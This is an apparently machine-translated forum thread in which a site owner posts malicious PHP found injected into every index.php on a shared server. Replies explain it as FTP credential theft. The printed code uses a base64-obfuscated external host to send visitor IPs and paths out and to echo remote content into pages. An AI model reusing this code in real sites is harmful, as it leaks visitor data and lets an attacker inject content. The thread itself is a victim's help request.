Database index.php被黑客攻击

*刚刚注意到，代码被注入到网站目录中的每个index.php文件以及同一服务器上其他网站目录中的每个index.php文件中

嗨，我一直在观察我的一个网站上发生的一件奇怪的事情；数据库表中的行正在神秘地消失。不是立刻，而是一天中，比如每30分钟左右排一行。不管怎么说，我一直在努力找出造成这种情况的原因，但我一直无法确定消失行的来源。因此，我开始怀疑可能有人在用机器人或其他邪恶的东西做这件事，尽管这些影响并没有对MySQL数据造成毁灭性的破坏。我想如果有机会，黑客会想破坏整个数据库。。。不仅仅是每30分钟因果删除一行

因此，当我打开服务器上的索引文件时，我发现了一块我没有编写的代码，无法理解。。。表示其他人能够修改服务器上的index.php文件。注入的php代码块附在下面：

if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
    if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
    $stCurlLink = base64_decode( 'aHR0cDovL2Jyb3dzZXJnbG9iYWxzdGF0LmNvbS9zdGF0RC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
        @$stCurlHandle = curl_init( $stCurlLink ); 
}
} 
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
$sResult = @curl_exec($stCurlHandle); 
if ($sResult[0]=="O") 
 {$sResult[0]=" ";
  echo $sResult; // Statistic code end
  }
curl_close($stCurlHandle); 
}
}

我和HostGator一起主持。这段代码会导致数据库中的行消失吗？

---

有人知道这个注入代码对我的网站有什么作用吗？这是XSS还是其他类型的黑客？我怎样才能防止这种事情？感谢您的建议。

不，这只是一个简单的ftp密码窃取。也许您使用Windows和Total Commander上载内容，并存储帐户密码。Windows工作站上的病毒合法地连接到FTP服务器，并将代码附加到每个目录的index.php。清理您的工作站并更改FTP密码

此代码将您的站点的所有url点击发送到地址。如果他们找到任何url来删除代码中的某些行，他们将使用这些url。